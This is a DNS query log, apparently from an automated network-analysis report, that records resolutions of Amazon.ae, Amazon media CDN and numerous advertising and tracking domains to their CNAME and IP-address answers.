                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.521384001 CEST1.1.1.1192.168.2.50xcab5No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.521384001 CEST1.1.1.1192.168.2.50xcab5No error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.521384001 CEST1.1.1.1192.168.2.50xcab5No error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.521384001 CEST1.1.1.1192.168.2.50xcab5No error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.521384001 CEST1.1.1.1192.168.2.50xcab5No error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.526911974 CEST1.1.1.1192.168.2.50x1fcfNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.526911974 CEST1.1.1.1192.168.2.50x1fcfNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.526911974 CEST1.1.1.1192.168.2.50x1fcfNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.526911974 CEST1.1.1.1192.168.2.50x1fcfNo error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.526911974 CEST1.1.1.1192.168.2.50x1fcfNo error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.526911974 CEST1.1.1.1192.168.2.50x1fcfNo error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.526911974 CEST1.1.1.1192.168.2.50x1fcfNo error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.576023102 CEST1.1.1.1192.168.2.50xc15cNo error (0)d1lxz4vuik53pc.cloudfront.net18.66.107.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.576023102 CEST1.1.1.1192.168.2.50xc15cNo error (0)d1lxz4vuik53pc.cloudfront.net18.66.107.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.576023102 CEST1.1.1.1192.168.2.50xc15cNo error (0)d1lxz4vuik53pc.cloudfront.net18.66.107.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.576023102 CEST1.1.1.1192.168.2.50xc15cNo error (0)d1lxz4vuik53pc.cloudfront.net18.66.107.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.202008963 CEST1.1.1.1192.168.2.50xccdaNo error (0)unagi-eu.amazon.com54.239.32.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.550770044 CEST1.1.1.1192.168.2.50x7de3No error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.550770044 CEST1.1.1.1192.168.2.50x7de3No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.550770044 CEST1.1.1.1192.168.2.50x7de3No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.550770044 CEST1.1.1.1192.168.2.50x7de3No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.550770044 CEST1.1.1.1192.168.2.50x7de3No error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.550770044 CEST1.1.1.1192.168.2.50x7de3No error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.550770044 CEST1.1.1.1192.168.2.50x7de3No error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.550770044 CEST1.1.1.1192.168.2.50x7de3No error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.572793961 CEST1.1.1.1192.168.2.50xc7fNo error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.572793961 CEST1.1.1.1192.168.2.50xc7fNo error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.572793961 CEST1.1.1.1192.168.2.50xc7fNo error (0)dlsq0ztllwnya.cloudfront.net52.222.236.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.572793961 CEST1.1.1.1192.168.2.50xc7fNo error (0)dlsq0ztllwnya.cloudfront.net52.222.236.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.572793961 CEST1.1.1.1192.168.2.50xc7fNo error (0)dlsq0ztllwnya.cloudfront.net52.222.236.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.572793961 CEST1.1.1.1192.168.2.50xc7fNo error (0)dlsq0ztllwnya.cloudfront.net52.222.236.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:57.901120901 CEST1.1.1.1192.168.2.50xeb3aName error (3)aan.amazon.aenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:59.352534056 CEST1.1.1.1192.168.2.50x8bfeNo error (0)aax-eu.amazon.aeaax-eu-retail-direct.amazon-adsystem.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:59.352534056 CEST1.1.1.1192.168.2.50x8bfeNo error (0)aax-eu-retail-direct.amazon-adsystem.com52.94.222.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:59.525639057 CEST1.1.1.1192.168.2.50xa8afNo error (0)completion.amazon.aecompletion.amazon.co.ukCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:59.525639057 CEST1.1.1.1192.168.2.50xa8afNo error (0)completion.amazon.co.uk3.253.168.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:00.191766024 CEST1.1.1.1192.168.2.50x3b45No error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:00.191766024 CEST1.1.1.1192.168.2.50x3b45No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:00.191766024 CEST1.1.1.1192.168.2.50x3b45No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:00.191766024 CEST1.1.1.1192.168.2.50x3b45No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.19.235.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:00.191766024 CEST1.1.1.1192.168.2.50x3b45No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.208.112.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:00.191766024 CEST1.1.1.1192.168.2.50x3b45No error (0)endpoint.prod.eu-west-1.forester.a2z.com63.32.77.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:00.191766024 CEST1.1.1.1192.168.2.50x3b45No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.247.159.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:00.191766024 CEST1.1.1.1192.168.2.50x3b45No error (0)endpoint.prod.eu-west-1.forester.a2z.com34.254.7.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:00.191766024 CEST1.1.1.1192.168.2.50x3b45No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.75.187.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:00.191766024 CEST1.1.1.1192.168.2.50x3b45No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.216.251.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:00.191766024 CEST1.1.1.1192.168.2.50x3b45No error (0)endpoint.prod.eu-west-1.forester.a2z.com176.34.141.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:03.134876966 CEST1.1.1.1192.168.2.50xc44fNo error (0)d5glw3nnbe3pc.cloudfront.net18.239.102.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:03.134876966 CEST1.1.1.1192.168.2.50xc44fNo error (0)d5glw3nnbe3pc.cloudfront.net18.239.102.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:03.134876966 CEST1.1.1.1192.168.2.50xc44fNo error (0)d5glw3nnbe3pc.cloudfront.net18.239.102.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:03.134876966 CEST1.1.1.1192.168.2.50xc44fNo error (0)d5glw3nnbe3pc.cloudfront.net18.239.102.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:03.390135050 CEST1.1.1.1192.168.2.50xf543Name error (3)aan.amazon.aenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:04.227833033 CEST1.1.1.1192.168.2.50xd6f2No error (0)googleads.g.doubleclick.net172.217.18.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:04.282032967 CEST1.1.1.1192.168.2.50xbf28No error (0)unagi-na.amazon.com44.215.118.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:04.282032967 CEST1.1.1.1192.168.2.50xbf28No error (0)unagi-na.amazon.com44.199.180.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:04.282032967 CEST1.1.1.1192.168.2.50xbf28No error (0)unagi-na.amazon.com44.215.133.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:04.282032967 CEST1.1.1.1192.168.2.50xbf28No error (0)unagi-na.amazon.com44.215.138.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:04.282032967 CEST1.1.1.1192.168.2.50xbf28No error (0)unagi-na.amazon.com44.215.129.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:04.282032967 CEST1.1.1.1192.168.2.50xbf28No error (0)unagi-na.amazon.com44.215.116.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:04.282032967 CEST1.1.1.1192.168.2.50xbf28No error (0)unagi-na.amazon.com44.215.137.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:04.282032967 CEST1.1.1.1192.168.2.50xbf28No error (0)unagi-na.amazon.com44.199.181.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:04.412201881 CEST1.1.1.1192.168.2.50x7bfbNo error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:04.412201881 CEST1.1.1.1192.168.2.50x7bfbNo error (0)unagi-eu.amazon.com54.239.32.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:07.654196978 CEST1.1.1.1192.168.2.50x204dNo error (0)redirect.prod.experiment.routing.cloudfront.aws.a2z.comredirect.stripe2.prod.experiment.routing.cloudfront.aws.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:07.654196978 CEST1.1.1.1192.168.2.50x204dNo error (0)redirect.stripe2.prod.experiment.routing.cloudfront.aws.a2z.comedger-edger-4e3vcwvnek77-1367313377.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:07.654196978 CEST1.1.1.1192.168.2.50x204dNo error (0)edger-edger-4e3vcwvnek77-1367313377.us-east-2.elb.amazonaws.com13.59.80.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:07.654196978 CEST1.1.1.1192.168.2.50x204dNo error (0)edger-edger-4e3vcwvnek77-1367313377.us-east-2.elb.amazonaws.com3.138.104.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:07.654196978 CEST1.1.1.1192.168.2.50x204dNo error (0)edger-edger-4e3vcwvnek77-1367313377.us-east-2.elb.amazonaws.com3.17.192.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.565548897 CEST1.1.1.1192.168.2.50xc9cdNo error (0)a33d5916f98192760c994c04dda69ded2.profile.cdg55-p2.cloudfront.net18.245.200.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.565548897 CEST1.1.1.1192.168.2.50xc9cdNo error (0)a33d5916f98192760c994c04dda69ded2.profile.cdg55-p2.cloudfront.net18.245.200.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.565548897 CEST1.1.1.1192.168.2.50xc9cdNo error (0)a33d5916f98192760c994c04dda69ded2.profile.cdg55-p2.cloudfront.net18.245.200.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.565548897 CEST1.1.1.1192.168.2.50xc9cdNo error (0)a33d5916f98192760c994c04dda69ded2.profile.cdg55-p2.cloudfront.net18.245.200.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.750087976 CEST1.1.1.1192.168.2.50x1450No error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.750087976 CEST1.1.1.1192.168.2.50x1450No error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.750087976 CEST1.1.1.1192.168.2.50x1450No error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.750087976 CEST1.1.1.1192.168.2.50x1450No error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.750087976 CEST1.1.1.1192.168.2.50x1450No error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.750087976 CEST1.1.1.1192.168.2.50x1450No error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.750087976 CEST1.1.1.1192.168.2.50x1450No error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.750087976 CEST1.1.1.1192.168.2.50x1450No error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.750087976 CEST1.1.1.1192.168.2.50x1450No error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.750087976 CEST1.1.1.1192.168.2.50x1450No error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.750087976 CEST1.1.1.1192.168.2.50x1450No error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.750087976 CEST1.1.1.1192.168.2.50x1450No error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.750087976 CEST1.1.1.1192.168.2.50x1450No error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.752240896 CEST1.1.1.1192.168.2.50xc1bdNo error (0)match.360yield.comice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.752240896 CEST1.1.1.1192.168.2.50xc1bdNo error (0)ice.360yield.comeuw-ice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.752240896 CEST1.1.1.1192.168.2.50xc1bdNo error (0)euw-ice.360yield.com52.31.116.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.752240896 CEST1.1.1.1192.168.2.50xc1bdNo error (0)euw-ice.360yield.com34.241.76.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.752240896 CEST1.1.1.1192.168.2.50xc1bdNo error (0)euw-ice.360yield.com34.249.147.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.752240896 CEST1.1.1.1192.168.2.50xc1bdNo error (0)euw-ice.360yield.com54.75.248.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.752240896 CEST1.1.1.1192.168.2.50xc1bdNo error (0)euw-ice.360yield.com108.128.151.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.752240896 CEST1.1.1.1192.168.2.50xc1bdNo error (0)euw-ice.360yield.com54.74.119.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.752240896 CEST1.1.1.1192.168.2.50xc1bdNo error (0)euw-ice.360yield.com63.34.214.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.752240896 CEST1.1.1.1192.168.2.50xc1bdNo error (0)euw-ice.360yield.com63.35.32.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.777944088 CEST1.1.1.1192.168.2.50xf66aNo error (0)audex.userreport.comd2u28gf9o4d1cv.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.777944088 CEST1.1.1.1192.168.2.50xf66aNo error (0)d2u28gf9o4d1cv.cloudfront.net18.239.94.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.777944088 CEST1.1.1.1192.168.2.50xf66aNo error (0)d2u28gf9o4d1cv.cloudfront.net18.239.94.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.777944088 CEST1.1.1.1192.168.2.50xf66aNo error (0)d2u28gf9o4d1cv.cloudfront.net18.239.94.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.777944088 CEST1.1.1.1192.168.2.50xf66aNo error (0)d2u28gf9o4d1cv.cloudfront.net18.239.94.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780595064 CEST1.1.1.1192.168.2.50xa1fcNo error (0)rd.frontend.weborama.fr35.190.24.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780881882 CEST1.1.1.1192.168.2.50xdb7fNo error (0)dsum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780881882 CEST1.1.1.1192.168.2.50xdb7fNo error (0)dsum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync.smartadserver.comrtb-csync-geo.usersync-prod-sas.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com164.132.25.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com178.32.197.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com5.135.209.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com217.182.178.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com5.135.209.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com91.134.110.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com164.132.25.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com217.182.178.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com91.134.110.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com178.32.197.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com5.196.111.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com149.202.238.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com149.202.238.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com51.178.195.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com51.178.195.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.780925035 CEST1.1.1.1192.168.2.50x2cbfNo error (0)rtb-csync-euw2.smartadserver.com5.196.111.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.781943083 CEST1.1.1.1192.168.2.50xc995No error (0)pbs.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.781943083 CEST1.1.1.1192.168.2.50xc995No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.781943083 CEST1.1.1.1192.168.2.50xc995No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.783269882 CEST1.1.1.1192.168.2.50xd5efNo error (0)capi.connatix.comcapi.connatix.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.784185886 CEST1.1.1.1192.168.2.50xc798No error (0)tags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.784279108 CEST1.1.1.1192.168.2.50x8c5dName error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.794342041 CEST1.1.1.1192.168.2.50x168bNo error (0)ads.stickyadstv.comip1.ads.stickyadstv.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.795516014 CEST1.1.1.1192.168.2.50xa2d2No error (0)public-prod-dspcookiematching.dmxleo.com188.65.124.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:09.731389999 CEST1.1.1.1192.168.2.50xaf05No error (0)sync.rfp.fout.jp35.186.196.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:09.798531055 CEST1.1.1.1192.168.2.50x47acNo error (0)s.amazon-adsystem.com52.46.143.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:09.803862095 CEST1.1.1.1192.168.2.50xf723Name error (3)beacon.krxd.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:09.821789980 CEST1.1.1.1192.168.2.50x4cc9No error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:09.821789980 CEST1.1.1.1192.168.2.50x4cc9No error (0)user-data-eu.bidswitch.net35.214.149.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:09.837646961 CEST1.1.1.1192.168.2.50x95f8No error (0)match.sharethrough.commatch-eu-central-1-ecs.sharethrough.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:09.837646961 CEST1.1.1.1192.168.2.50x95f8No error (0)match-eu-central-1-ecs.sharethrough.com18.184.119.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.513773918 CEST1.1.1.1192.168.2.50xcf13No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.853919029 CEST1.1.1.1192.168.2.50xa510No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.853919029 CEST1.1.1.1192.168.2.50xa510No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.853919029 CEST1.1.1.1192.168.2.50xa510No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.853919029 CEST1.1.1.1192.168.2.50xa510No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.31.157.181A (IP address)IN (0x0001)false
